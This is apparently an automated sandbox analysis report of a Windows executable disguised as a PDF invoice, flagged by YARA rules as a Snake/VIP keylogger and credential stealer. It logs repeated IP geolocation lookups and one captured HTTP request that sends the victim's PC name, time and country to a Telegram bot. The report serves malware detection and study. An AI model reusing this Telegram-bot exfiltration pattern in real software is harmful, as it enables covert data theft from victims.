                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r%2FG%2FHYwx6BTjSSFs6ajygYkdE2aJSJHEzTBc8ckWvwOObg6rr32Z5HRheoTCyet1eBqVKKyQE%2BH5yln%2BWf%2BvccW6r0%2B3UwyiGWY2YBC70uBizaglwicruwwHxoJRK059n7m5%2BIl7"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 90229fd888b542c0-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1718&min_rtt=1715&rtt_var=650&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1676234&cwnd=212&unsent_bytes=0&cid=960d25f6f1934a24&ts=141&x=0"
                                                                                                              2025-01-15 03:01:59 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              2192.168.2.549712104.21.96.1443320C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-15 03:02:01 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                              Host: reallyfreegeoip.org
                                                                                                              2025-01-15 03:02:01 UTC861INHTTP/1.1 200 OK
                                                                                                              Date: Wed, 15 Jan 2025 03:02:01 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 362
                                                                                                              Connection: close
                                                                                                              Age: 2224910
                                                                                                              Cache-Control: max-age=31536000
                                                                                                              cf-cache-status: HIT
                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gf2614GruCpusPUyCCiH1HowJWW%2FEW%2BPpcelFsC%2Bz7fUffp3EUfyRPjDxLmJUpf2QkyBSLeoz0heU53MAB%2FvFH72i%2FW4qlW410ojqB1507Di1G7YFaRGgVXFZxG8nKkmhk3%2BHOaf"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 90229fe18f384363-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1542&min_rtt=1533&rtt_var=594&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1814791&cwnd=240&unsent_bytes=0&cid=d37898d95ccfb0bf&ts=317&x=0"
                                                                                                              2025-01-15 03:02:01 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              3192.168.2.549715104.21.96.1443320C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-15 03:02:02 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                              Host: reallyfreegeoip.org
                                                                                                              Connection: Keep-Alive
                                                                                                              2025-01-15 03:02:02 UTC861INHTTP/1.1 200 OK
                                                                                                              Date: Wed, 15 Jan 2025 03:02:02 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 362
                                                                                                              Connection: close
                                                                                                              Age: 2224911
                                                                                                              Cache-Control: max-age=31536000
                                                                                                              cf-cache-status: HIT
                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A%2B7OZOBwyljxjWPaNw3WWuGLZWFVDxX%2BZXKVrHLN%2F4Trvomsuf7QStvkTEwfKe9VYbWPl%2BSBNBFMrub6eSTMcp5pz2tkdg%2FDtlohxHYA%2Bx7naq0reo7auS6GtatVddP83xWRAyOD"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 90229fe95953c32e-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2314&min_rtt=2260&rtt_var=886&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1292035&cwnd=178&unsent_bytes=0&cid=e196a732a11e2d2e&ts=140&x=0"
                                                                                                              2025-01-15 03:02:02 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              4192.168.2.549717104.21.96.1443320C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-15 03:02:03 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                              Host: reallyfreegeoip.org
                                                                                                              2025-01-15 03:02:03 UTC855INHTTP/1.1 200 OK
                                                                                                              Date: Wed, 15 Jan 2025 03:02:03 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 362
                                                                                                              Connection: close
                                                                                                              Age: 2224912
                                                                                                              Cache-Control: max-age=31536000
                                                                                                              cf-cache-status: HIT
                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AYGmx87xzEynAxg9mB490y2VXIGadxB3ykeT66hu5hqkNcPsB0yShWLbVkzfMvbs8afjd6Q6kxM3r%2FwQtd5C8C61u%2BJ6X9ogb4H5iHQJsJtnuCDbtBiDCJ4%2BPSDL5IUw0UadfnW0"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 90229ff16fab1a48-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2020&min_rtt=2013&rtt_var=770&sent=3&recv=5&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1406551&cwnd=157&unsent_bytes=0&cid=d821171098f83c93&ts=133&x=0"
                                                                                                              2025-01-15 03:02:03 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              5192.168.2.549719104.21.96.1443320C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-15 03:02:05 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                              Host: reallyfreegeoip.org
                                                                                                              2025-01-15 03:02:05 UTC857INHTTP/1.1 200 OK
                                                                                                              Date: Wed, 15 Jan 2025 03:02:05 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 362
                                                                                                              Connection: close
                                                                                                              Age: 2224914
                                                                                                              Cache-Control: max-age=31536000
                                                                                                              cf-cache-status: HIT
                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kyMh0nABf7IaTu9DByVm9BKdqU1UKOb0sFBMeXYmczzbaZMcYsrwqWobdCsdh5SWWGAqBdltrG4tU35nzCq85746v3%2Fy1QdhmQt%2Ber9AB2xJDAHerDt%2BJiIRGI1Z1tN7E%2B7HPgMa"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 90229ff9dd2972a4-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2026&min_rtt=2022&rtt_var=766&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1421616&cwnd=212&unsent_bytes=0&cid=0946f71fd8eda558&ts=166&x=0"
                                                                                                              2025-01-15 03:02:05 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              6192.168.2.549721104.21.96.1443320C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-15 03:02:06 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                              Host: reallyfreegeoip.org
                                                                                                              Connection: Keep-Alive
                                                                                                              2025-01-15 03:02:06 UTC857INHTTP/1.1 200 OK
                                                                                                              Date: Wed, 15 Jan 2025 03:02:06 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 362
                                                                                                              Connection: close
                                                                                                              Age: 2224915
                                                                                                              Cache-Control: max-age=31536000
                                                                                                              cf-cache-status: HIT
                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I%2BX7PYUCtpBO6wTKfFx2BbZFpoFvhhpFJBrFqMYJYb2jn1t%2FtrFkLTbRLXzNvTmWJs%2BRe6hz2hbyZWWbVDaB5sOeY734uZ7mpnR165jFi8vKCXEzKqHZ%2FqgEmRyTCrh0iBLfYktK"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 9022a001be204363-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1550&min_rtt=1543&rtt_var=593&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1825000&cwnd=240&unsent_bytes=0&cid=00bd30365a388c0b&ts=186&x=0"
                                                                                                              2025-01-15 03:02:06 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              7192.168.2.549723104.21.96.1443320C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-15 03:02:07 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                              Host: reallyfreegeoip.org
                                                                                                              Connection: Keep-Alive
                                                                                                              2025-01-15 03:02:07 UTC853INHTTP/1.1 200 OK
                                                                                                              Date: Wed, 15 Jan 2025 03:02:07 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 362
                                                                                                              Connection: close
                                                                                                              Age: 2224916
                                                                                                              Cache-Control: max-age=31536000
                                                                                                              cf-cache-status: HIT
                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h5PmlVqzlcFNXbs%2FgqIReEt3PmOQiBLHL0GOplM8zR9ocXGeIyZwlkebzbpafFD4zMIgT3TBPX9NOK%2FG6Ybf9BuMQ49I7JEp9G4Jbo1DWYNut9zEAAToVnsioAkj9mZNJv83UIVh"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 9022a009c803c32e-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1515&min_rtt=1513&rtt_var=571&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1909744&cwnd=178&unsent_bytes=0&cid=78edc46c0e2acfee&ts=150&x=0"
                                                                                                              2025-01-15 03:02:07 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              8192.168.2.549725104.21.96.1443320C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-15 03:02:08 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                              Host: reallyfreegeoip.org
                                                                                                              Connection: Keep-Alive
                                                                                                              2025-01-15 03:02:08 UTC853INHTTP/1.1 200 OK
                                                                                                              Date: Wed, 15 Jan 2025 03:02:08 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 362
                                                                                                              Connection: close
                                                                                                              Age: 2224918
                                                                                                              Cache-Control: max-age=31536000
                                                                                                              cf-cache-status: HIT
                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j2dMRE9OabsAxRuUFAXZ5%2FY0TDGiksc%2FuXfPHzkAFyFvSH2fCIRySNeYNbCPRpNtPYVrpocoRAuu45DyTXbbuBTtAYPMN7UX9WTNBlpLOeUcGUsABfMPLf3MuvDqjtxad8o5qIrt"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 9022a011be0f72a4-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1965&min_rtt=1960&rtt_var=746&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1457085&cwnd=212&unsent_bytes=0&cid=c1738a321b37878c&ts=135&x=0"
                                                                                                              2025-01-15 03:02:08 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              9192.168.2.549726149.154.167.220443320C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-15 03:02:09 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:414408%0D%0ADate%20and%20Time:%2015/01/2025%20/%2009:17:21%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20414408%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                              Host: api.telegram.org
                                                                                                              Connection: Keep-Alive
                                                                                                              2025-01-15 03:02:09 UTC344INHTTP/1.1 404 Not Found
                                                                                                              Server: nginx/1.18.0
                                                                                                              Date: Wed, 15 Jan 2025 03:02:09 GMT
                                                                                                              Content-Type: application/json
                                                                                                              Content-Length: 55
                                                                                                              Connection: close
                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                              2025-01-15 03:02:09 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                              Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                              Statistics

                                                                                                              CPU Usage

                                                                                                              Click to jump to process

                                                                                                              Memory Usage

                                                                                                              Click to jump to process

                                                                                                              High Level Behavior Distribution

                                                                                                              Click to dive into process behavior distribution

                                                                                                              Behavior

                                                                                                              Click to jump to process

                                                                                                              System Behavior

                                                                                                              General

                                                                                                              Target ID:0
                                                                                                              Start time:22:01:54
                                                                                                              Start date:14/01/2025
                                                                                                              Path:C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe"
                                                                                                              Imagebase:0xa00000
                                                                                                              File size:854'016 bytes
                                                                                                              MD5 hash:EBA7FF0D3CB799AF22795E1D3C55360C
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2042995856.0000000004672000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.2042995856.0000000004672000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2042995856.0000000004672000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2042995856.0000000004672000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:3
                                                                                                              Start time:22:01:55
                                                                                                              Start date:14/01/2025
                                                                                                              Path:C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe"
                                                                                                              Imagebase:0xc80000
                                                                                                              File size:854'016 bytes
                                                                                                              MD5 hash:EBA7FF0D3CB799AF22795E1D3C55360C
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4499590469.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
